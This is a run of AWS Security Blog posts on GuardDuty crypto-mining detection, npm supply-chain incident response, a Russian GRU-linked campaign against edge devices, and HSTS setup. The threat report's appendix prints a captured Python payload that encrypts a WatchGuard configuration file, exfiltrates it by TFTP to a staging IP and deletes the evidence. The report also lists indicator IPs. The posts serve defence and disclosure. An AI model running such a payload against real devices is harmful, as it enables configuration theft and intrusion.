                    "lambda:FunctionUrlAuthType": "NONE" Β Β  Β  Β  Β 
                } Β Β  Β  Β 
            } Β Β  Β 
        } Β Β 
    ] 
}

Detection methods using GuardDuty

The multilayered detection approach of GuardDuty proved highly effective in identifying all stages of the attack chain using threat intelligence, anomaly detection, and the recently launched Extended Threat Detection capabilities for EC2 and ECS.

Next, we walk through the details of these features and how you can deploy them to detect attacks such as these. You can enable GuardDuty foundational protection plan to receive alerts on crypto mining campaigns like the one described in this post. To further enhance detection capabilities, we highly recommend enabling GuardDuty Runtime Monitoring, which will extend finding coverage to system-level events on Amazon EC2, Amazon ECS, and Amazon Elastic Kubernetes Service (Amazon EKS).

GuardDuty EC2 findings

Threat intelligence findings for Amazon EC2 are part of the GuardDuty foundational protection plan, which will alert you to suspicious network behaviors involving your instances. These behaviors can include brute force attempts, connections to malicious or crypto domains, and other suspicious behaviors. Using third-party threat intelligence and internal threat intelligence, including active threat defense and MadPot, GuardDuty provides detection over the indicators in this post through the following findings: CryptoCurrency:EC2/BitcoinTool.B and CryptoCurrency:EC2/BitcoinTool.B!DNS.

GuardDuty IAM findings

The IAMUser/AnomalousBehavior findings spanning multiple tactic categories (PrivilegeEscalation, Impact, Discovery) showcase the ML capability of GuardDuty to detect deviations from normal user behavior. In the incident described in this post, the compromised credentials were detected due to the threat actor using them from an anomalous network and location and calling APIs that were unusual for the accounts.

GuardDuty Runtime Monitoring

GuardDuty Runtime Monitoring is an important component for Extended Threat Detection attack sequence correlation. Runtime Monitoring provides host level signals, such as operating system visibility, and extends detection coverage by analyzing system-level logs indicating malicious process execution at the host and container level, including the execution of crypto mining programs on your workloads. The CryptoCurrency:Runtime/BitcoinTool.B!DNS and CryptoCurrency:Runtime/BitcoinTool.B findings detect network connections to crypto-related domains and IPs, while the Impact:Runtime/CryptoMinerExecuted finding detects when a process running is associated with a cryptocurrency mining activity.

GuardDuty Extended Threat Detection

Launched at re:Invent 2025, AttackSequence:EC2/CompromisedInstanceGroup finding represents one of the latest Extended Threat Detection capabilities in GuardDuty. This feature uses AI and ML algorithms to automatically correlate security signals across multiple data sources to detect sophisticated attack patterns of EC2 resource groups. Although AttackSequences for EC2 are included in the GuardDuty foundational protection plan, we strongly recommend enabling Runtime Monitoring. Runtime Monitoring provides key insights and signals from compute environments, enabling detection of suspicious host-level activities and improving correlation of attack sequences. For AttackSequence:ECS/CompromisedCluster attack sequences, Runtime Monitoring is required to correlate container-level activity.

Monitoring and remediation recommendations

To protect against similar crypto mining attacks, AWS customers should prioritize strong identity and access management controls. Implement temporary credentials instead of long-term access keys, enforce multi-factor authentication (MFA) for all users, and apply least privilege to IAM principals limiting access to only required permissions. You can use AWS CloudTrail to log events across AWS services and combine logs into a single account to make them available to your security teams to access and monitor. To learn more, refer to Receiving CloudTrail log files from multiple accounts in the CloudTrail documentation.

Confirm GuardDuty is enabled across all accounts and Regions with Runtime Monitoring enabled for comprehensive coverage. Integrate GuardDuty with AWS Security Hub and Amazon EventBridge or third-party tooling to enable automated response workflows and rapid remediation of high-severity findings. Implement container security controls, including image scanning policies and monitoring for unusual CPU allocation requests in ECS task definitions. Finally, establish specific incident response procedures for crypto mining attacks, including documented steps to handle instances with disabled API terminationβ€”a technique used by this attacker to complicate remediation efforts.

If you believe your AWS account has been impacted by a crypto mining campaign, refer to remediation steps in the GuardDuty documentation: Remediating potentially compromised AWS credentials, Remediating a potentially compromised EC2 instance, and Remediating a potentially compromised ECS cluster.

To stay up to date on the latest techniques, visit the Threat Technique Catalog for AWS.


If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Kyle Koeller Kyle Koeller
Kyle is a security engineer in the GuardDuty team with a focus on threat detection. He is passionate about cloud threat detection and offensive security, and he holds the following certifications: CompTIA Security+, PenTest+, CompTIA Network Vulnerability Assessment Professional, and SecurityX. When not working, Kyle enjoys spending his time in the gym and exploring New York City.

What AWS Security learned from responding to recent npm supply chain threat campaigns

15 December 2025 at 22:12

AWS incident response operates around the clock to protect our customers, the AWS Cloud, and the AWS global infrastructure. Through that work, we learn from a variety of issues and spot unique trends.

Over the past few months, high-profile software supply chain threat campaigns involving third party software repositories have highlighted the importance of protecting software supply chains for organizations of all types. In this post, we share how AWS responded to recent threats like the Nx package compromise, the Shai-Hulud worm, and a token-farming campaign in which Amazon Inspector identified more than 150,000 malicious packages (one of the largest attacks ever seen in open-source registries).

AWS Security responded to each of the examples in this post with a methodical and systematic approach. A key part of our incident response approach is to continually drive improvements into our response workflow and security systems to improve ahead of future incidents. We are also deeply committed to helping our customers and the global security community improve. Our goal with this post is to share our experiences responding to these incidents and to share the lessons we’ve learned.

Nx compromise attempts to scale through Generative AI

In late August 2025, abnormal patterns in third party software Generative AI prompt executions triggered an immediate escalation to our incident response teams. Within 30 minutes, a security incident command was established, and teams around the world began coordinating an investigation.

The investigation uncovered and confirmed the presence of a Javascript file, β€œtelemetry.js”, that was designed to exploit GenAI command line tools through a popular npm package called Nx that had been compromised.
Our teams analyzed the malware and confirmed that the actors were attempting to steal sensitive configuration files through GitHub. However, they failed to generate valid access tokens which prevented any data from being compromised. This analysis resulted in critical data that helped our teams take direct action to protect AWS and our customers.

Working through our incident response process, some of the tasks our teams undertook included:

  • Produced a comprehensive impact assessment of AWS services and infrastructure. The assessment acts as a map that defines the scope of the incident and identifies the areas of the environment that need to be verified as part of the response.
  • Implemented repository-level blocklisting of npm packages to prevent further exposure to the compromised npm packages.
  • Conducted a deep dive to identify any potentially affected resources and look for any other attack vectors.
  • Investigated, analyzed, and remediated any affected hosts.
  • Used the learnings from our analysis to create improved detections across the environment and to enhance the security measures for Amazon Q. This included new system prompt guardrails to reject credential-harvesting, fixes to prevent system prompt extraction, and additional hardening measures for high-privilege execution modes.

The learnings from this work resulted in improvements we ingested into our incident response process and enhanced our detections mechanisms by improving how we monitor behavioral anomalies and cross-reference multiple intelligence sources. These efforts proved critical in identifying and responding to subsequent npm supply chain threat campaigns attacks.

Shai-Hulud and other npm campaigns

Then, just 3 weeks later in early September 2025, the two other npm supply chain campaigns began: the first targeted 18 popular packages (like Chalk and Debug) and the second dubbed, β€œShai-Hulud”, targeted 180 packages in its first wave, with a second wave, β€œShai-Hulud 2β€³, occurring in late November 2025. These types of campaigns attempt to compromise trusted developer machines to gain a foothold in an environment.

The Shai-Hulud worm attempts to harvest npm tokens, GitHub personal access tokens, and cloud credentials. When npm tokens are found, Shai-Hulud expands its reach by publishing infected packages as updates to packages those tokens have access to in the npm registry. The now compromised packages will execute the worm as a postinstall script, continuing to propagate the infection as new users download them. The worm also attempts to manipulate GitHub repositories to use malicious workflows to propagate and maintain its foothold in the repositories it has already infected.

While these events each took a different approach, the lessons AWS Security learned from the response to the Nx package compromise contributed to the response to these campaigns. Within 7 minutes of the publication of the packages affected by Shai-Hulud, we initiated our response process. Some of the key tasks we undertook during these responses included:

  • Registered the affected packages with the Open Source Security Foundation (OpenSSF), enabling a coordinated response across the security community.
    > Read more about how the Amazon Inspector team’s detection systems discovered these packages and how they work with the OpenSSF to help the security community respond to incidents like this one.
  • Performed monitoring to detect anomalous behavior. Where suspicious activity was detected, we took immediate action to notify impacted customers through AWS Personal Health Dashboard notifications, AWS Support cases, and direct email to the security contact for the accounts.
  • Analyzed the compromised npm packages to better understand the full capabilities of the worm, including development of a custom detonation script using generative AI, which was safely executed in a controlled sandbox environment. This work revealed the methods used by the malware to target GitHub tokens, AWS credentials, Google Cloud credentials, npm tokens, and environment variables. With this information, we used AI to analyze obfuscated JavaScript code to expand the scope of known indicators and affected packages.

By improving how we detect anomalous behavior that’s consistent with credential theft, how we analyze patterns across the npm repository, andβ€”yet againβ€”cross-referencing against multiple intelligence sources, AWS Security was able to build a deeper understanding of these types of coordinated campaigns. This helps to distinguish legitimate package activity from these types of malicious activities. This helped our teams respond even more effectively just a month later.

tea[.]xyz token farming

Late October and into early November, the techniques developed by the Amazon Inspector team that had been refined in the previous incidents detected a spike in compromised npm packages. The system discovered a renewed push to compromise the Tea tokens used to help recognize work done in the open-source community.

The team discovered 150,000 compromised packages during the threat actor’s campaign. At each detection, the team was able to automatically register the malicious package with the OpenSSF malicious package registry within 30 minutes. This rapid response not only protected customers using Amazon Inspector, but by sharing these results with the community, other teams and tools could protect their environments as well.

Every time that AWS Security teams identified a detection, we learned something new and we were able to incorporate this into our incident response process and further enhance our detections. The unique target of this campaignβ€”tea[.]xyz tokensβ€”provided another vector to refine the detections and protections various AWS Security teams had in place.

And, as we were finalizing this post (December 2025), we encountered another wave of activity seemingly targeting npm packagesβ€”nearly 1,000 suspicious packages detected in the npm registry over the course of a week. This wave, referred to as β€œelf-β€œ, was engineered to steal sensitive system data and authentication credentials. Our automated defense mechanisms swiftly identified these packages and reported them to the OpenSSF.

How you can protect your organization

In this post, we’ve described how we learn from our incident response process and how the recent supply chain campaigns targeting the npm registry have helped us improve our internal systems and the products our customers use to fulfill their responsibilities in the Shared Responsibility Model. While each customer’s scale and systems will differ, we recommend incorporating the AWS Well-Architected Framework and the AWS Security Incident Response Technical Guide into your organization’s operations, and adopting the following strategy to enhance the resilience of your organization against these types of attacks:

  1. Implement continuous monitoring and enhanced detections to identify unusual patterns, enabling early threat detection. Periodically audit security tooling detection coverage by comparing results against multiple authoritative sources. AWS Services like AWS Security Hub provide a comprehensive view of the cloud environment, security findings and compliance checks enabling organizations to respond at scale and Amazon Inspector can assist with continuous monitoring of the software supply chain.
  2. Adopt layered protection, including automated vulnerability scanning and management (e.g. Amazon GuardDuty and Amazon Inspector) behavioral monitoring for anomalous package behavior (e.g. Amazon Cloudwatch and AWS Cloudtrail), credential management (Security best practices in IAM), and network controls to prevent data exfiltration (AWS Network Firewall).
  3. Maintain a comprehensive inventory of all open-source dependencies, including transitive dependencies and deployment locations, enabling rapid response when threats are identified. AWS services like Amazon Elastic Container Registry (ECR) can assist with automatic container scanning to identify vulnerabilities, and AWS Systems Manager [1] [2] can be configured to meet security and compliance objectives.
  4. Report suspicious packages to maintainers, share threat intelligence with industry groups, and participate in initiatives that strengthen collective defense. See our AWS Security Bulletins page for more information about recent security bulletins posted. Partnerships and contributing to the global security community matters.
  5. Implement proactive research, comprehensive investigation, and coordinated response (e.g. AWS Security Incident Response), which use a combination of security tooling, subject matter experts, and practiced response procedures.

Supply chain attacks continue to evolve in sophistication and scale, as demonstrated by examples mentioned in this post. These campaigns share common patterns – exploiting trust relationships within the open-source network, operating at massive scale, credential harvesting and unauthorized secrets access, and using enhanced techniques to evade traditional security controls.

The lessons learned from these events underscore the critical importance of implementing layered security controls, maintaining continuous monitoring, and participating in collaborative defense efforts. As these threats continue to evolve, AWS continues to provide customers with on-going protection through our comprehensive security approach. We are committed to continuous learning to help improve our work, to help our customers, and help the security community.

Contributors to this post: Mark Nunnikhoven, Catherine Watkins, Tam Ngo, Anna Brinkmann, Christine DeFazio, Chris Warfield, David Oxley, Logan Bair, Patrick Collard, Chun Feng, Sai Srinivas Vemula, Jorge Rodriguez, and Hari Nagarajan


If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Nikki Pahliney Nikki Pahliney
Nikki is the AWS Security Messaging Manager, heading up a team of security messaging specialists involved in curating security communications for our external customers, managing the AWS Security Blog and aws.amazon.com/security web content. Her experience spans across IT security and security messaging, operational process redesign, technical program management, financial modeling, business management, and recruitment.
David Magnotti David Magnotti
David Magnotti is a Principal Security Engineer in Amazon Threat Intelligence, where he helps design and operate the investigative programs that underpin Amazon’s cyber threat intelligence capabilities. His work focuses on analyzing cyber threat activity, including state-sponsored and sophisticated criminal activity, translating relevant findings into actionable protections across Amazon and AWS.
Jeff Laskowski Jeff Laskowski
Jeff is a seasoned cybersecurity and IT executive with over 30 years of experience in enterprise transformation and strategic innovation. Currently serving as a Senior Manager at AWS, he focuses on global corporate cybersecurity response. His distinguished career includes leading high-profile cyber incident investigations, directing cyber attack recoveries, and driving strategic initiatives. A Computer Science graduate from Old Dominion University and based in Herndon, Virginia, Jeff’s expertise spans software development, enterprise architecture and secure IT environments.
Ryan Tick Ryan Tick
Ryan is a Senior Security Engineer at AWS focused on threat detection and incident response at scale. Before AWS, he worked as a consultant helping customers prevent, prepare, and respond to potential security events in AWS. Outside of work, Ryan enjoys spending time with his family, cheering on the Notre Dame Fighting Irish football team, and traveling.
Charlie Bacon Charlie Bacon
Charlie is Head of Security Engineering and Research for Amazon Inspector at AWS. He leads the teams behind the vulnerability scanning and inventory collection services which power Amazon Inspector and other Amazon Security vulnerability management tools. Before joining AWS, he spent two decades in the financial and security industries where he held senior roles in both research and product development.
Chi Tran Chi Tran
Chi is a Senior Security Researcher at Amazon Web Services, specializing in open-source software supply chain security. He leads the R&D of the engine behind Amazon Inspector that detects malicious packages in open-source software. As an Amazon Inspector SME, Chi provides technical guidance to customers on complex security implementations and advanced use cases. His expertise spans cloud security, vulnerability research, and application security. Chi holds industry certifications including OSCP, OSCE, OSWE, and GPEN, has discovered multiple CVEs, and holds pending patents in open-source security innovation.
Dan Dutrow Dan Dutrow
Dan is an AWS Security Software Development Manager heading up Sonaris, and internal tool used by Amazon to analyze security telemetry to identify and help stop network, application, and credential abuse across AWS. He is an experienced engineering leader of multidisciplinary teams using software engineering, data science, and security analysis to solve cloud security challenges.
Stephen Goodman

Stephen Goodman

As a senior manager for Amazon active defense, Stephen leads data-driven programs to protect AWS customers and the internet from threat actors.

Albin Vattakattu

Albin Vattakattu

BlackHat and DEFCON speaker, Albin is a Senior Security Engineer and Team Lead at AWS. He brings over a decade of expertise in network and application security. Prior to AWS, he led incident response teams across North and South America. Albin holds a Master’s degree in cybersecurity from New York University along with multiple security certifications, including CISSP.

Amazon Threat Intelligence identifies Russian cyber threat group targeting Western critical infrastructure

15 December 2025 at 20:20

As we conclude 2025, Amazon Threat Intelligence is sharing insights about a years-long Russian state-sponsored campaign that represents a significant evolution in critical infrastructure targeting: a tactical pivot where what appear to be misconfigured customer network edge devices became the primary initial access vector, while vulnerability exploitation activity declined. This tactical adaptation enables the same operational outcomes, credential harvesting, and lateral movement into victim organizations’ online services and infrastructure, while reducing the actor’s exposure and resource expenditure.

Going into 2026, organizations must prioritize securing their network edge devices and monitoring for credential replay attacks to defend against this persistent threat. Based on infrastructure overlaps with known Sandworm (also known as APT44 and Seashell Blizzard) operations observed in Amazon’s telemetry and consistent targeting patterns, we assess with high confidence this activity cluster is associated with Russia’s Main Intelligence Directorate (GRU). The campaign demonstrates sustained focus on Western critical infrastructure, particularly the energy sector, with operations spanning 2021 through the present day.

Technical details

Campaign scope and targeting: Amazon Threat Intelligence observed sustained targeting of global infrastructure between 2021-2025, with particular focus on the energy sector. The campaign demonstrates a clear evolution in tactics.

Timeline:

  • 2021-2022: WatchGuard exploitation (CVE-2022-26318) detected by Amazon MadPot; misconfigured device targeting observed
  • 2022-2023: Confluence vulnerability exploitation (CVE-2021-26084, CVE-2023-22518); continued misconfigured device targeting
  • 2024: Veeam exploitation (CVE-2023-27532); continued misconfigured device targeting
  • 2025: Sustained targeting of misconfigured customer network edge device targeting; decline in N-day/zero-day exploitation activity

Primary targets:

  • Energy sector organizations across Western nations
  • Critical infrastructure providers in North America and Europe
  • Organizations with cloud-hosted network infrastructure

Commonly targeted resources:

  • Enterprise routers and routing infrastructure
  • VPN concentrators and remote access gateways
  • Network management appliances
  • Collaboration and wiki platforms
  • Cloud-based project management systems

Targeting the β€œlow-hanging fruit” of likely misconfigured customer devices with exposed management interfaces achieves the same strategic objectives, which is persistent access to critical infrastructure networks and credential harvesting for accessing victim organizations’ online services. The threat actor’s shift in operational tempo represents a concerning evolution: while customer misconfiguration targeting has been ongoing since at least 2022, the actor maintained sustained focus on this activity in 2025 while reducing investment in zero-day and N-day exploitation. The actor accomplishes this while significantly reducing the risk of exposing their operations through more detectable vulnerability exploitation activity.

Credential harvesting operations

While we did not directly observe the victim organization credential extraction mechanism, multiple indicators point to packet capture and traffic analysis as the primary collection method:

  1. Temporal analysis: Time gap between device compromise and authentication attempts against victim services suggests passive collection rather than active credential theft
  2. Credential type: Use of victim organization credentials (not device credentials) for accessing online services indicates interception of user authentication traffic
  3. Known tradecraft: Sandworm operations consistently involve network traffic interception capabilities
  4. Strategic positioning: Targeting of customer network edge devices specifically positions the actor to intercept credentials in transit

Infrastructure targeting

Compromise of infrastructure hosted on AWS: Amazon’s telemetry reveals coordinated operations against customer network edge devices hosted on AWS. This was not due to a weakness in AWS; these appear to be customer misconfigured devices. Network connection analysis shows actor-controlled IP addresses establishing persistent connections to compromised EC2 instances operating customers’ network appliance software. Analysis revealed persistent connections consistent with interactive access and data retrieval across multiple affected instances.

Credential replay operations: Beyond direct victim infrastructure compromise, we observed systematic credential replay attacks against victim organizations’ online services. In observed instances, the actor compromised customer network edge devices hosted on AWS, then subsequently attempted authentication using credentials associated with the victim organization’s domain against their online services. While these specific attempts were unsuccessful, the pattern of device compromise followed by authentication attempts using victim credentials supports our assessment that the actor harvests credentials from compromised customer network infrastructure for replay against target organizations’ online services. Actor infrastructure accessed victims’ authentication endpoints for multiple organizations across critical sectors through 2025, including:

  • Energy sector: Electric utility organizations, energy providers, and managed security service providers specializing in energy sector clients
  • Technology/cloud services: Collaboration platforms, source code repositories
  • Telecommunications: Telecom providers across multiple regions

Geographic distribution: The targeting demonstrates global reach:

  • North America
  • Europe (Western and Eastern)
  • Middle East
  • The targeting demonstrates sustained focus on the energy sector supply chain, including both direct operators and third-party service providers with access to critical infrastructure networks.

    Campaign flow:

  1. Compromise customer network edge device hosted on AWS.
  2. Leverage native packet capture capability.
  3. Harvest credentials from intercepted traffic.
  4. Replay credentials against victim organizations’ online services and infrastructure.
  5. Establish persistent access for lateral movement.

Infrastructure overlap with β€œCurly COMrades”

Amazon Threat Intelligence identified threat actor infrastructure overlap with group Bitdefender tracks as β€œCurly COMrades.” We assess these may represent complementary operations within a broader GRU campaign:

  • Bitdefender’s reporting: Post-compromise host-based tradecraft (Hyper-V abuse for EDR evasion, custom implants CurlyShell/CurlCat)
  • Amazon’s telemetry: Initial access vectors and cloud pivot methodology

This potential operational division, where one cluster focuses on network access and initial compromise while another handles host-based persistence and evasion, aligns with GRU operational patterns of specialized subclusters supporting broader campaign objectives.

Amazon’s response and disruption

Amazon remains committed to helping protect customers and the broader internet ecosystem by actively investigating and disrupting sophisticated threat actors.

Immediate response actions:

  • Identified and notified affected customers of compromised network appliance resources
  • Enabled immediate remediation of compromised EC2 instances
  • Shared intelligence with industry partners and affected vendors
  • Reported observations to network appliance vendors to help support security investigations

Disruption impact: Through coordinated efforts, since our discovery of this activity, we have disrupted active threat actor operations and reduced the attack surface available to this threat activity subcluster. We will continue working with the security community to share intelligence and collectively defend against state-sponsored threats targeting critical infrastructure.

Defending your organization

Immediate priority actions for 2026

Organizations should proactively monitor for evidence of this activity pattern:

1. Network edge device audit

  • Audit all network edge devices for unexpected packet capture files or utilities.
  • Review device configurations for exposed management interfaces.
  • Implement network segmentation to isolate management interfaces.
  • Enforce strong authentication (eliminate default credentials, implement MFA).

2. Credential replay detection

  • Review authentication logs for credential reuse between network device management interfaces and online services.
  • Monitor for authentication attempts from unexpected geographic locations.
  • Implement anomaly detection for authentication patterns across your organization’s online services.
  • Review extended time windows following any suspected device compromise for delayed credential replay attempts.

3. Access monitoring

  • Monitor for interactive sessions to router/appliance administration portals from unexpected source IPs.
  • Examine whether network device management interfaces are inadvertently exposed to the internet.
  • Audit for plain text protocol usage (Telnet, HTTP, unencrypted SNMP) that could expose credentials.

4. IOC review
Energy sector organizations and critical infrastructure operators should prioritize reviewing access logs for authentication attempts from the IOCs listed below.

AWS-specific recommendations

For AWS environments, implement these protective measures:

Identity and access management:

  • Manage access to AWS resources and APIs using identity federation with an identity provider and IAM roles whenever possible.
  • For more information, see Creating IAM policies in the IAM User Guide.

Network security:

  • Implement the least permissive rules for your security groups.
  • Isolate management interfaces in private subnets with bastion host access.
  • Enable VPC Flow Logs for network traffic analysis.

Vulnerability management:

  • Use Amazon Inspector to automatically discover and scan Amazon EC2 instances for software vulnerabilities and unintended network exposure.
  • For more information, see the Amazon Inspector User Guide.
  • Regularly patch, update, and secure the operating system and applications on your instances.

Detection and monitoring:

  • Enable AWS CloudTrail for API activity monitoring.
  • Configure Amazon GuardDuty for threat detection.
  • Review authentication logs for credential replay patterns.

Indicators of Compromise (IOCs)

IOC Value IOC Type First Seen Last Seen Annotation
91.99.25[.]54 IPv4 2025-07-02 Present Compromised legitimate server used to proxy threat actor traffic
185.66.141[.]145 IPv4 2025-01-10 2025-08-22 Compromised legitimate server used to proxy threat actor traffic
51.91.101[.]177 IPv4 2024-02-01 2024-08-28 Compromised legitimate server used to proxy threat actor traffic
212.47.226[.]64 IPv4 2024-10-10 2024-11-06 Compromised legitimate server used to proxy threat actor traffic
213.152.3[.]110 IPv4 2023-05-31 2024-09-23 Compromised legitimate server used to proxy threat actor traffic
145.239.195[.]220 IPv4 2021-08-12 2023-05-29 Compromised legitimate server used to proxy threat actor traffic
103.11.190[.]99 IPv4 2021-10-21 2023-04-02 Compromised legitimate staging server used to exfiltrate WatchGuard configuration files
217.153.191[.]190 IPv4 2023-06-10 2025-12-08 Long-term infrastructure used for reconnaissance and targeting

Note: All identified IPs are compromised legitimate servers that may serve multiple purposes for the actor or continue legitimate operations. Organizations should investigate context around any matches rather than automatically blocking. We observed these IPs specifically accessing router management interfaces and attempting authentication to online services during the timeframes listed.

Technical appendix: CVE-2022-26318 Exploit payload

The following payload was captured by Amazon MadPot during the 2022 WatchGuard exploitation campaign:

from cryptography.fernet import Fernet
import subprocess
import os

key = β€˜uVrZfUGeecCBHhFmn1Zu6ctIQTwkFiW4LGCmVcd6Yrk='

with open('/etc/wg/config.xml’, β€˜rb’) as config_file:
buf = config_file.read()

fernet = Fernet(key)
enc_buf = fernet.encrypt(buf)

with open('/tmp/enc_config.xml’, β€˜wb’) as encrypted_config:
encrypted_config.write(enc_buf)

subprocess.check_output([β€˜tftp’, '-p’, '-l’, '/tmp/enc_config.xml’, '-r’,
'[REDACTED].bin’, β€˜103.11.190[.]99'])
os.remove('/tmp/enc_config.xml’)

This payload demonstrates the actor’s methodology: encrypt stolen configuration data, exfiltrate via TFTP to compromised staging infrastructure, and remove forensic evidence.


If you have feedback about this post, submit comments in theΒ CommentsΒ section below. If you have questions about this post, contact AWS Support.

CJ Moses

CJ Moses

CJ Moses is the CISO of Amazon Integrated Security. In his role, CJ leads security engineering and operations across Amazon. His mission is to enable Amazon businesses by making the benefits of security the path of least resistance. CJ joined Amazon in December 2007, holding various roles including Consumer CISO, and most recently AWS CISO, before becoming CISO of Amazon Integrated Security September of 2023.

Prior to joining Amazon, CJ led the technical analysis of computer and network intrusion efforts at the Federal Bureau of Investigation’s Cyber Division. CJ also served as a Special Agent with the Air Force Office of Special Investigations (AFOSI). CJ led several computer intrusion investigations seen as foundational to the security industry today.

CJ holds degrees in Computer Science and Criminal Justice, and is an active SRO GT America GT2 race car driver.

Implementing HTTP Strict Transport Security (HSTS) across AWS services

12 December 2025 at 22:53

Modern web applications built on Amazon Web Services (AWS) often span multiple services to deliver scalable, performant solutions. However, customers encounter challenges when implementing a cohesive HTTP Strict Transport Security (HSTS) strategy across these distributed architectures.

Customers face fragmented security implementation challenges because different AWS services require distinct approaches to HSTS configuration, leading to inconsistent security postures.Applications using Amazon API Gateway for APIs, Amazon CloudFront for content delivery, and Application load balancers for web traffic lack unified HSTS policies, leading to complex multi-service environments. Security scanners flag missing HSTS headers, but remediation guidance is scattered across service-specific documentation, causing security compliance gaps.

HSTS is a web security policy mechanism that protects websites against protocol downgrade attacks and cookie hijacking. When properly implemented, HSTS instructs browsers to interact with applications exclusively through HTTPS connections, providing critical protection against man-in-the-middle issues.

This post provides a comprehensive approach to implementing HSTS across key AWS services that form the foundation of modern cloud applications:

  1. Amazon API Gateway: Secure REST and HTTP APIs with centralized header management
  2. Application Load Balancer: Infrastructure-level HSTS enforcement for web applications
  3. Amazon CloudFront: Edge-based security header delivery for global content

By following the implementation steps in this post, you can establish a unified HSTS strategy that aligns with AWS Well-Architected Framework security principles while maintaining optimal application performance.

Understanding HSTS security and its benefits

HTTP Strict Transport Security is a web security policy mechanism that helps protect websites against protocol downgrade attacks and cookie hijacking. When a web server declares HSTS policy through the Strict-Transport-Security header, compliant browsers automatically convert HTTP requests to HTTPS for the specified domain. This enforcement occurs at the browser level, providing protection even before the initial request reaches your infrastructure.

HSTS enforcement applies specifically to web browser clients. Most programmatic clients (such as SDKs, command line tools, or application-to-application communication) don’t enforce HSTS policies. For comprehensive security, configure your applications and infrastructure to only use HTTPS connections regardless of client type rather than relying solely on HSTS for protocol enforcement.

HTTP to HTTPS redirection enforcement on the server ensures future requests reach your applications over encrypted connections. However, it leaves a security gap during the initial browser request. Understanding this gap helps explain why client-side HSTS serves as an essential security layer in modern web applications.

For example, when users access web applications, the typical flow with redirects configured is as follows:

  1. User enters example.com in their browser.
  2. Browser sends an HTTP request to http://example.com.
  3. Server responds with HTTP 301/302 redirect to https://example.com.
  4. Browser follows redirection and establishes HTTPS connection

The initial HTTP request in step 2 creates an opportunity for protocol downgrade issues. An unauthorized party positioned between the user and your infrastructure can intercept this request and respond with content that appears legitimate while maintaining an insecure connection. This technique, known as SSL stripping, can occur even when your server-side AWS infrastructure is properly configured with HTTPS redirects.

HSTS addresses this security gap by moving security enforcement to the browser level. After a browser receives an HSTS policy, it automatically converts HTTP requests to HTTPS before sending them over the network:

  1. User enters example.com in browser.
  2. Browser automatically converts to HTTPS due to stored HSTS policy.
  3. Browser sends HTTPS request directly to https://example.com.
  4. No initial HTTP request removes the opportunity for interception.

This browser-level enforcement provides protection that complements your AWS infrastructure security configurations, creating defense in depth against protocol downgrade issues.

Although current browsers warn about insecure connections, HSTS provides programmatic enforcement. This prevents unauthorized parties from exploiting the security gap because they can’t forge valid HTTPS certificates for protected domains.

The security benefits of HSTS extend beyond simple protocol enforcement. HSTS helps prevent protocol downgrade issues after HSTS policy is established in the browser. It mitigates against man-in-the-middle issues, preventing unauthorized parties from intercepting communications. It also helps prevent unauthorized session access to protect against credential theft and unintended session access.
HSTS requires HTTPS connections and removes the option to bypass certificate warnings.

This post focuses exclusively on implementing the HTTP Strict-Transport-Security header. Although the examples include additional security headers for completeness, detailed configuration of those headers is beyond the scope of this post.

Key use cases for HSTS implementation

HSTS protects scenarios that HTTP redirects miss. For example, when legacy systems serve mixed content, or when SSO flows redirect users between providers, HSTS keeps connections encrypted throughout.

Applications serving both modern HTTPS content and legacy HTTP resources face protocol downgrade risks. When users access example.com/app that loads resources from legacy.example.com, HSTS prevents browsers from making initial HTTP requests to any subdomain, eliminating the vulnerability window during resource loading.

SSO implementations redirecting users between identity providers and applications create multiple HTTP request opportunities. Due to HSTS, authentication tokens and session data remain encrypted throughout the entire SSO flow, preventing credential interception during provider redirects.

Microservices architectures using API Gateway often involve service-to-service communication and client redirects. HSTS protects API endpoints from protocol downgrade during initial client connections, which means that API keys and authentication headers are not transmitted over HTTP.

Applications using CloudFront with multiple origin servers face security challenges when origins change or fail over. HSTS prevents browsers from falling back to HTTP when accessing cached content or during origin failover scenarios, maintaining encryption even during infrastructure changes.

From an AWS Well-Architected perspective, implementing HSTS demonstrates adherence to the defense in depth principle by adding an additional layer of security at the application protocol level. This approach complements other AWS security services and features, creating a comprehensive security posture that helps to protect data both in transit and at rest.

Implementing HSTS with Amazon API Gateway

Amazon API Gateway lacks built-in features to enable HSTS for the API resources. There are several different ways to configure HSTS headers in HTTP APIs and REST APIs.
For HTTP APIs, you can configure response parameter mapping to set HSTS headers when it’s invoked using a default endpoint or custom domain.

To configure response parameter mapping:

  1. Navigate to your desired HTTP API’s route configuration in the AWS API Gateway console
  2. Access the route’s integration settings under Manage integrations tab.
Figure 1: Integration settings of the HTTP Api

Figure 1: Integration settings of the HTTP Api

  1. To configure parameter mapping, under Response key, enter 200.
  2. Under Modification type, select Append in the dropdown menu.
  3. Under β€œParameter to modify”, enter header.Strict-Transport-Security
  4. Under Value, enter max-age=31536000; includeSubDomains; preload.
Figure 2: Parameter Mapping for the HTTP Api integration

Figure 2: Parameter Mapping for the HTTP Api integration

REST APIs in Amazon API Gateway offer more granular control over HSTS implementation through both proxy and non-proxy integration patterns.

For proxy integrations, the backend service assumes responsibility for HSTS header generation. For example, an AWS Lambda proxy integration must return the HSTS headers in its response as shown in the following code example:

importΒ json 
defΒ lambda_handler(event, context): Β Β  Β 
	returnΒ { Β Β  Β  Β  Β 
        'statusCode': 200, Β Β  Β  Β  Β 
        'headers': { Β Β  Β  Β  Β  Β  Β 
            'Strict-Transport-Security': 'max-age=31536000; includeSubDomains; preload' Β Β  Β  Β  Β 
        }, Β Β  Β  Β  Β 
        'body': json.dumps('Secure response with HSTS headers') Β Β  Β 
    }

For non-proxy integrations, the HSTS headers must be returned by the Rest API by implementing one of two methods, either mapping templates or method response.

In the mapping templates method, the mapping template is used to configure the HSTS headers. The Velocity Template Language (VTL) for the mapping template is used for dynamic header generation. To implement this method:

  1. Navigate to the desired REST API and click on the method for the desired resource.
  2. Under the β€˜Integration response’ tab, use the following mapping template to set the response headers:
$input.json("$") 
#set($newValue = "$input.params().header.get('Host')") 
#set($context.responseOverride.header.Strict-Transport-Security 
= "max-age=31536000; includeSubDomains; preload")

Figure 3: Adding mapping template to integration response of the Rest Api

Figure 3: Adding mapping template to integration response of the Rest Api

The β€˜Method response’ tab provides declarative configuration through explicit header mapping in the configuration. To implement this method:

  1. Navigate to your desired REST API and select the method for the desired resource.
  2. Choose Method response and under Header name, add the HSTS header strict-transport-security.
Figure 4: Method response of the Rest Api

Figure 4: Method response of the Rest Api

